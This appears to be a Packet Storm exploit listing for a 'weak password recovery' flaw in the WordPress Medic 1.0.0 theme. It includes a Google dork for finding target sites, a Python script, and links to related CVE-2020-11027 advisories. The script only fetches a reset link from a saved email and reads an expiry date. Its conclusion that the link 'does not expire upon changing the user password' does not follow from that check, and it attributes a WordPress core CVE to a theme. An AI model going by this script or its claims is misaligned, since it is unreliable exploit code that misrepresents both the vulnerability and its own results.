Lucene search
Amirhossein BahramizadehPACKETSTORM:173034HistoryJun 20, 2023 - 12:00 a.m.
WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism
2023-06-2000:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
196
wordpress
medic theme
weak password recovery
cve-2020-11027
templatemonster
windows
linux
password reset
email
vulnerability
exploitation
webapps
EPSS
0.008
Percentile
81.7%
`# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = '[email protected]'
# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
email = f.read()
soup = BeautifulSoup(email, 'html.parser')
reset_link = soup.find('a', href=True)['href']
print(f'Reset Link: {reset_link}')
# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
# Get the expiration date from the reset link HTML
soup = BeautifulSoup(response.text, 'html.parser')
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
print(f'Expiration Date: {expiration_date}')
# Check if the expiration date is less than 24 hours from now
if expiration_date < datetime.now() + timedelta(hours=24):
print('Password reset link expires upon changing the user password.')
else:
print('Password reset link does not expire upon changing the user password.')
else:
print(f'Error fetching reset link: {response.status_code} {response.text}')
exit()
`
Related
nvd
nvd
CVE-2020-11027
2020-04-30 23:15:11
osv
osv
BIT-wordpress-2020-11027
2024-03-06 11:12:11
BIT-wordpress-multisite-2020-11027
2024-03-06 11:12:02
CVE-2020-11027
2020-04-30 23:15:11
prion
prion
Design/Logic Flaw
2020-04-30 23:15:00
veracode
veracode
Insecure Password Reset Mechanism
2020-05-04 04:16:05
exploitdb
exploitdb
zdt
zdt
ubuntucve
ubuntucve
CVE-2020-11027
2020-04-30 00:00:00
debiancve
debiancve
CVE-2020-11027
2020-04-30 23:15:11
wpvulndb
wpvulndb
WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
2020-04-29 00:00:00
cve
cve
CVE-2020-11027
2020-04-30 23:15:11
cvelist
cvelist
CVE-2020-11027 Password reset links invalidation issue in WordPress
2020-04-30 00:00:00
openvas
openvas
WordPress Multiple Vulnerabilities (May 2020) - Linux
2020-05-05 00:00:00
WordPress Multiple Vulnerabilities (May 2020) - Windows
2020-05-05 00:00:00
Debian: Security Advisory (DLA-2208-1)
2020-05-12 00:00:00
nessus
nessus
Debian DLA-2208-1 : wordpress security update
2020-05-12 00:00:00
Debian DSA-4677-1 : wordpress - security update
2020-05-07 00:00:00
debian
debian
[SECURITY] [DLA 2208-1] wordpress security update
2020-05-11 13:43:12
[SECURITY] [DSA 4677-1] wordpress security update
2020-05-06 06:30:09
[SECURITY] [DSA 4677-1] wordpress security update
2020-05-06 06:30:09